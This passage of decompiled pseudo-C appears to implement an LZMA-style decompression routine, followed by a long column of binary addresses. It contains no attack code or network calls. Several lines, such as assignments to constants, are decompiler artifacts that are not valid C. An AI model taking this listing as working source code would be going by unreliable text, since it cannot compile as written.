												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                    0x00000000
                                                                                                    0x00406767
                                                                                                    0x00406767
                                                                                                    0x0040676b
                                                                                                    0x00406790
                                                                                                    0x0040679a
                                                                                                    0x00000000
                                                                                                    0x0040676d
                                                                                                    0x0040676d
                                                                                                    0x00406770
                                                                                                    0x00406774
                                                                                                    0x00406777
                                                                                                    0x0040677a
                                                                                                    0x0040677e
                                                                                                    0x0040677e
                                                                                                    0x00406781
                                                                                                    0x0040685b
                                                                                                    0x0040685b
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x004068fd
                                                                                                    0x00406900
                                                                                                    0x00406905
                                                                                                    0x00406906
                                                                                                    0x00406908
                                                                                                    0x0040690a
                                                                                                    0x0040690d
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fbe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x00000000
                                                                                                    0x00405fcf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fd8
                                                                                                    0x00405fdb
                                                                                                    0x00405fde
                                                                                                    0x00405fe2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fe8
                                                                                                    0x00405feb
                                                                                                    0x00405fed
                                                                                                    0x00405fee
                                                                                                    0x00405ff1
                                                                                                    0x00405ff3
                                                                                                    0x00405ff4
                                                                                                    0x00405ff6
                                                                                                    0x00405ff9
                                                                                                    0x00405ffe
                                                                                                    0x00406003
                                                                                                    0x0040600c
                                                                                                    0x0040601f
                                                                                                    0x00406022
                                                                                                    0x0040602e
                                                                                                    0x00406056
                                                                                                    0x00406058
                                                                                                    0x00406066
                                                                                                    0x00406066
                                                                                                    0x0040606a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x0040605a
                                                                                                    0x0040605d
                                                                                                    0x0040605e
                                                                                                    0x0040605e
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x00406034
                                                                                                    0x00406039
                                                                                                    0x00406039
                                                                                                    0x00406042
                                                                                                    0x0040604a
                                                                                                    0x0040604d
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406070
                                                                                                    0x00406070
                                                                                                    0x00406074
                                                                                                    0x00406920
                                                                                                    0x00000000
                                                                                                    0x00406920
                                                                                                    0x0040607d
                                                                                                    0x0040608d
                                                                                                    0x00406090
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406096
                                                                                                    0x0040609a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040609c
                                                                                                    0x004060a2
                                                                                                    0x004060cc
                                                                                                    0x004060d2
                                                                                                    0x004060d9
                                                                                                    0x00000000
                                                                                                    0x004060d9
                                                                                                    0x004060a8
                                                                                                    0x004060ab
                                                                                                    0x004060b0
                                                                                                    0x004060b0
                                                                                                    0x004060bb
                                                                                                    0x004060c3
                                                                                                    0x004060c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040610b
                                                                                                    0x00406111
                                                                                                    0x00406114
                                                                                                    0x00406121
                                                                                                    0x00406129
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004060e0
                                                                                                    0x004060e0
                                                                                                    0x004060e4
                                                                                                    0x0040692f
                                                                                                    0x00000000
                                                                                                    0x0040692f
                                                                                                    0x004060f0
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fe
                                                                                                    0x00406101
                                                                                                    0x00406104
                                                                                                    0x00406109
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004067a0
                                                                                                    0x004067a0
                                                                                                    0x004067a6
                                                                                                    0x004067ac
                                                                                                    0x004067b2
                                                                                                    0x004067cc
                                                                                                    0x004067cf
                                                                                                    0x004067d5
                                                                                                    0x004067e0
                                                                                                    0x004067e0
                                                                                                    0x004067e2
                                                                                                    0x004067b4
                                                                                                    0x004067b4
                                                                                                    0x004067c3
                                                                                                    0x004067c7
                                                                                                    0x004067c7
                                                                                                    0x004067ec
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004067ee
                                                                                                    0x004067f2
                                                                                                    0x004069a1
                                                                                                    0x00000000
                                                                                                    0x004069a1
                                                                                                    0x004067fe
                                                                                                    0x00406805
                                                                                                    0x0040680d
                                                                                                    0x00406810
                                                                                                    0x00406813
                                                                                                    0x00406813
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406131
                                                                                                    0x00406133
                                                                                                    0x00406136
                                                                                                    0x004061a7
                                                                                                    0x004061aa
                                                                                                    0x004061ad
                                                                                                    0x004061b4
                                                                                                    0x004061be
                                                                                                    0x00000000
                                                                                                    0x004061be
                                                                                                    0x00406138
                                                                                                    0x0040613c
                                                                                                    0x0040613f
                                                                                                    0x00406141
                                                                                                    0x00406144
                                                                                                    0x00406147
                                                                                                    0x00406149
                                                                                                    0x0040614c
                                                                                                    0x0040614e
                                                                                                    0x00406153
                                                                                                    0x00406156
                                                                                                    0x00406159
                                                                                                    0x0040615d
                                                                                                    0x00406164
                                                                                                    0x00406167
                                                                                                    0x0040616e
                                                                                                    0x00406172
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x0040617e
                                                                                                    0x00406181
                                                                                                    0x0040619f
                                                                                                    0x004061a1
                                                                                                    0x00000000
                                                                                                    0x00406183
                                                                                                    0x00406183
                                                                                                    0x00406186
                                                                                                    0x00406189
                                                                                                    0x0040618c
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x00406191
                                                                                                    0x00406194
                                                                                                    0x00406196
                                                                                                    0x00406197
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x004063d0
                                                                                                    0x004063d4
                                                                                                    0x004063f2
                                                                                                    0x004063f5
                                                                                                    0x004063fc
                                                                                                    0x004063ff
                                                                                                    0x00406402
                                                                                                    0x00406405
                                                                                                    0x00406408
                                                                                                    0x0040640b
                                                                                                    0x0040640d
                                                                                                    0x00406414
                                                                                                    0x00406415
                                                                                                    0x00406417
                                                                                                    0x0040641a
                                                                                                    0x0040641d
                                                                                                    0x00406420
                                                                                                    0x00406420
                                                                                                    0x00406425
                                                                                                    0x00000000
                                                                                                    0x00406425
                                                                                                    0x004063d6
                                                                                                    0x004063d9
                                                                                                    0x004063dc
                                                                                                    0x004063e6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040643a
                                                                                                    0x0040643e
                                                                                                    0x00406461
                                                                                                    0x00406464
                                                                                                    0x00406467
                                                                                                    0x00406471
                                                                                                    0x00406440
                                                                                                    0x00406440
                                                                                                    0x00406443
                                                                                                    0x00406446
                                                                                                    0x00406449
                                                                                                    0x00406456
                                                                                                    0x00406459
                                                                                                    0x00406459
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040647d
                                                                                                    0x00406481
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406487
                                                                                                    0x0040648b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406491
                                                                                                    0x00406493
                                                                                                    0x00406497
                                                                                                    0x00406497
                                                                                                    0x0040649a
                                                                                                    0x0040649e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064ee
                                                                                                    0x004064f2
                                                                                                    0x004064f9
                                                                                                    0x004064fc
                                                                                                    0x004064ff
                                                                                                    0x00406509
                                                                                                    0x00000000
                                                                                                    0x00406509
                                                                                                    0x004064f4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406515
